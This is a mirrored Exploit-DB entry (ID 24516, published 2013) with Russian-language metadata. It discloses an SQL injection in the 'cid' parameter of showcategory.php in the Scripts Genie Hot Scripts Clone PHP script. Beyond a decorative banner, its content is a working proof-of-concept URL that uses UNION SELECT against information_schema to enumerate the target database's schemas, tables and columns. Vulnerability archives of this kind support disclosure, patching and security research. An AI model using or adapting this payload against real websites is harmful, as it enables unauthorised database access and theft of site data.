- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24516
- Проверка EDB
-
- Пройдено
- Автор
- EASY LASTER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2013-02-18
Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection
Код:
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+ Security Flaw +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+ __ _ +
+ ___ ___ ___ _ _ /\ \ \___| |_ +
+/ __|/ _ \/ __| | | |/ \/ / _ \ __| +
+\__ \ __/ (__| |_| / /\ / __/ |_ +
+|___/\___|\___|\__,_\_\ \/ \___|\__| +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+
+Scripts Genie Hot Scripts Clone Script+
+ SQL Injection Vulnerability PoC +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+
+ Discovered by Easy Laster +
+ Autor : Easy Laster +
+ Date :17.02.2013 +
+ Script:Scripts Genie +
+ Hot Scripts Clone Script +
+ scriptsgenie.com +
+ Price ::$1.75 +
+ Language: PHP +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+ Vulnerability +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+hutscripts/showcategory.php?cid=[SQLi]+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+ Proof of Concept +
+ Crawling the MYSQL Stack +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
/hutscripts/showcategory.php?cid=21+uni
on+select+1,concat_ws(0x3a,table_schema
,table_name,column_name),3,4,5+from+inf
ormation_schema.columns+limit+180,1--+- Источник
- www.exploit-db.com
